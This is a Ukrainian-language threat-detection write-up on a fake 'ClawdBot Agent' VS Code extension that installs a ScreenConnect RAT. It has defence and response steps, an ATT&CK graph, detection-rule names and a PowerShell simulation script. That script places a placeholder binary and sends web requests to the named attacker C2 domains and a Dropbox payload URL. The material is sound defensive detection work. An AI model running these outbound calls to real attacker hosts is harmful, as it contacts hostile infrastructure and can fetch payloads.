Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисне розширення для Visual Studio Code під назвою ClawdBot Agent видає себе за AI асистента по кодуванню, але таємно встановлює модифікований інструмент віддаленого доступу ScreenConnect на Windows при запуску VS Code. Під час запуску розширення отримує конфігураційний файл з домена, контрольованого атакуючим, потім завантажує і запускає підроблений двійковий файл VS Code (Code.exe) разом з допоміжними DLL. Як другий шлях доставки, воно може завантажити той самий інсталятор з посилання на Dropbox, щоб підтримувати доступність навантаження. Кампанія зловживає довіреним інструментом підтримки ІТ, щоб зливатися з легітимною діяльністю віддаленого адміністрування та знижувати підозри.
Розслідування
Дослідники отримали package.json розширення, підтвердили активацію при запуску VS Code і отримали віддалену JSON-конфігурацію, яка містить зловмисні компоненти. Аналіз двійкових файлів показав підписані модулі ScreenConnect, які відправляли сигнали на спеціальний релей-сервер. Додаткова логіка резервування була виявлена в JavaScript і PowerShell, з посиланнями на додаткові домени та навантаження, розміщені на Dropbox. Артефакти на диску були виявлені у папці %TEMP%Lightshot.
Захист
Видаліть розширення ClawdBot Agent з VS Code та видаліть залишкові файли з місця встановлення ScreenConnect і каталог %TEMP%Lightshot. Видаліть клієнтський сервіс ScreenConnect і блокуйте вихідні з’єднання до ідентифікованих релей-доменів та IP-адрес. Оновіть всі API-ключі або секрети, які могли бути введені у розширення.
Відповідь
Виявляйте зловмисне розширення, відстежуючи встановлення розширень VS Code та створення каталогу Lightshot. Попереджуйте про виконання Code.exe або ScreenConnect двійкових файлів з нестандартних шляхів і про вихідні з’єднання до meeting.bulletmailer.net:8041 або пов’язаних IP-адрес. Виконайте форензичний аналіз хоста, щоб підтвердити видалення постійності та виявити додаткові навантаження.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#ffe599 classDef server fill:#c2f0c2 classDef process fill:#d9d9d9 %% Technique nodes tech_software_ext[“<b>Техніка</b> – <b>T1176 Розширення програмного забезпечення</b><br/>Зловмисники можуть зловживати програмними розширеннями для виконання коду, закріплення або ексфільтрації даних.”] class tech_software_ext action tech_ide_ext[“<b>Техніка</b> – <b>T1176.002 Розширення IDE</b><br/>Зловмисники використовують розширення інтегрованих середовищ розробки для запуску шкідливого коду або досягнення стійкості.”] class tech_ide_ext action tech_user_exec[“<b>Техніка</b> – <b>T1204.002 Виконання користувачем: шкідливий файл</b><br/>Жертва навмисно або ненавмисно запускає шкідливий файл.”] class tech_user_exec action tech_app_layer[“<b>Техніка</b> – <b>T1071.001 Протокол прикладного рівня: веб-протоколи</b><br/>Використання стандартних веб-протоколів (HTTP/HTTPS) для зв’язку C2.”] class tech_app_layer action tech_fallback[“<b>Техніка</b> – <b>T1008 Резервні канали</b><br/>Використання альтернативних шляхів зв’язку, якщо основні канали недоступні.”] class tech_fallback action tech_powershell[“<b>Техніка</b> – <b>T1059.001 Інтерпретатор команд і скриптів: PowerShell</b><br/>Використання PowerShell для виконання команд, завантаження файлів або взаємодії із системою.”] class tech_powershell action tech_rat[“<b>Техніка</b> – <b>T1219 Засоби віддаленого доступу</b><br/>Використання програм віддаленого доступу для контролю над скомпрометованими хостами.”] class tech_rat action tech_dll_inject[“<b>Техніка</b> – <b>T1055.001 Ін’єкція процесів: DLL-ін’єкція</b><br/>Ін’єкція шкідливої DLL у запущений процес для виконання коду в його контексті.”] class tech_dll_inject action tech_appcert[“<b>Техніка</b> – <b>T1546.009 Подійно-кероване виконання: AppCert DLL</b><br/>Бокове завантаження DLL через реєстрацію AppCert для завантаження легітимним компонентом.”] class tech_appcert action tech_appinit[“<b>Техніка</b> – <b>T1546.010 Подійно-кероване виконання: AppInit DLL</b><br/>Завантаження шкідливої DLL через механізм реєстру AppInit_DLLs під час старту системи.”] class tech_appinit action %% Artifact nodes ext_clawdbot[“<b>Інструмент</b> – <b>Назва</b>: VS Code розширення ClawdBot Agent<br/><b>Тип</b>: IDE-розширення”] class ext_clawdbot tool activation_event[“<b>Файл</b> – <b>Назва</b>: activationEvents \”onStartupFinished\””] class activation_event file init_core[“<b>Дія</b> – initCore() запускається під час старту VS Code”] class init_core action c2_domain[“<b>Сервер</b> – clawdbot.getintwopc.site”] class c2_domain server fallback_urls[“<b>Сервер</b> – Жорстко закодовані резервні URL”] class fallback_urls server ps_script[“<b>Скрипт</b> – PowerShell-скрипт для завантаження резервного payload”] class ps_script file lightshot[“<b>Файл</b> – Lightshot.exe / Lightshot.dll (резервний payload)”] class lightshot file darkgpt[“<b>Сервер</b> – darkgptprivate.com”] class darkgpt server code_exe[“<b>Шкідливе ПЗ</b> – Code.exe (озброєний клієнт ScreenConnect)”] class code_exe file relay_server[“<b>Сервер</b> – meeting.bulletmailer.net:8041”] class relay_server server dwrite_dll[“<b>Файл</b> – DWrite.dll (шкідлива DLL, що імітує DirectWrite)”] class dwrite_dll file screenconnect_proc[“<b>Процес</b> – Компонент ScreenConnect”] class screenconnect_proc process %% Connections ext_clawdbot –>|використовує| tech_software_ext ext_clawdbot –>|використовує| tech_ide_ext ext_clawdbot –>|визначає| activation_event activation_event –>|запускає| init_core init_core –>|отримує конфігурацію з| c2_domain c2_domain –>|використовує| tech_app_layer init_core –>|може перейти на| fallback_urls fallback_urls –>|доставляє| ps_script ps_script –>|виконує| tech_powershell tech_powershell –>|завантажує| lightshot lightshot –>|виконується як| tech_user_exec lightshot –>|доставляється як| code_exe code_exe –>|використовує| tech_rat code_exe –>|підключається до| relay_server relay_server –>|забезпечує| tech_app_layer code_exe –>|завантажує| dwrite_dll dwrite_dll –>|реєструється для| tech_appcert dwrite_dll –>|реєструється для| tech_appinit dwrite_dll –>|інʼєктується через| tech_dll_inject tech_dll_inject –>|націлюється на| screenconnect_proc screenconnect_proc –>|виконує| dwrite_dll tech_fallback –>|охоплює| fallback_urls
Потік атаки
Виявлення
Альтернативне програмне забезпечення для віддаленого доступу / управління (через process_creation)
Переглянути
Завантаження або вивантаження через Powershell (через cmdline)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу / управління (через audit)
Переглянути
Альтернативне програмне забезпечення для віддаленого доступу / управління (через system)
Переглянути
IOC (DestinationIP) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
IOC (SourceIP) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
IOC (HashSha256) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
IOC (Emails) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT
Переглянути
Встановлення помилкового розширення ClawdBot VS Code інсталює RAT ScreenConnect [Створення процесу Windows]
Переглянути
Виявлення встановлення фальшивого розширення ClawdBot VS Code, яке інсталює RAT ScreenConnect [Підключення до мережі Windows]
Переглянути
Виконання симуляції
Передумова: Телеметрія та попередня перевірка бази повинні були пройти.
Наратив атаки та команди
- Атакуючий публікує троянський розширення для VS Code під назвою “Clawdbot Helper”.
-
Жертва встановлює розширення через маркетплейс VS Code, яке запускає
скрипт postinstallякий таємно поміщає клієнт ScreenConnect (ScreenConnect.Client.exe) в%APPDATA%ScreenConnect. - Безпосередньо за встановленнямклієнт ініціює три вихідні TCP-з’єднання до доменів C2, контрольованих атакуючим, щоб отримати додаткові навантаження та повідомити про статус хоста.
-
Вихідні з’єднання генерують записи Sysmon Event ID 3, які відповідають
списку dest_ip, задовольняючи правило виявлення.
Скрипт регресійного тестування
# --------------------------------------------------------------
# Імітація зловмисної процедур установки розширення VS Code
# --------------------------------------------------------------
# Крок 1 – Помістити муляжний двійковий файл ScreenConnect (симуляція)
$payloadPath = "$env:APPDATAScreenConnectScreenConnect.Client.exe"
New-Item -ItemType Directory -Path (Split-Path $payloadPath) -Force | Out-Null
# Створення безпечного файлу-заповнювача (наприклад, копія notepad.exe)
Copy-Item -Path "$env:SystemRootSystem32notepad.exe" -Destination $payloadPath -Force
# Крок 2 – Надіслати вихідні запити до кожного хоста C2
$c2Hosts = @(
"http://meeting.bulletmailer.net/collect",
"http://clawdbot.getintwopc.site/payload",
"https://www.dropbox.com/s/evilpayload.exe"
)
foreach ($url in $c2Hosts) {
try {
# Тиха веб-запит; -UseBasicParsing уникнення запрошень на UI
Invoke-WebRequest -Uri $url -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null
Write-Host "контакт з $url"
} catch {
Write-Host "Не вдалося сконтактувати з $url (очікувано в пісочниці)."
}
}
# Кінець скрипту – на цей момент Sysmon повинен був зафіксувати три
# Події підключення до мережі, чиї значення DestinationIp відповідають правилу.Команди очищення
# --------------------------------------------------------------
# Видалення симульованих артефактів
# --------------------------------------------------------------
# Зупинити будь-які залишкові PowerShell завдання (жодного в цьому простому скрипті)
Get-Job | Remove-Job -Force
# Видалити муляжний каталог клієнта ScreenConnect
Remove-Item -Path "$env:APPDATAScreenConnect" -Recurse -Force
# Опціонально очистіть буфер Sysmon (потрібні права адміністратора)
# sysmon -c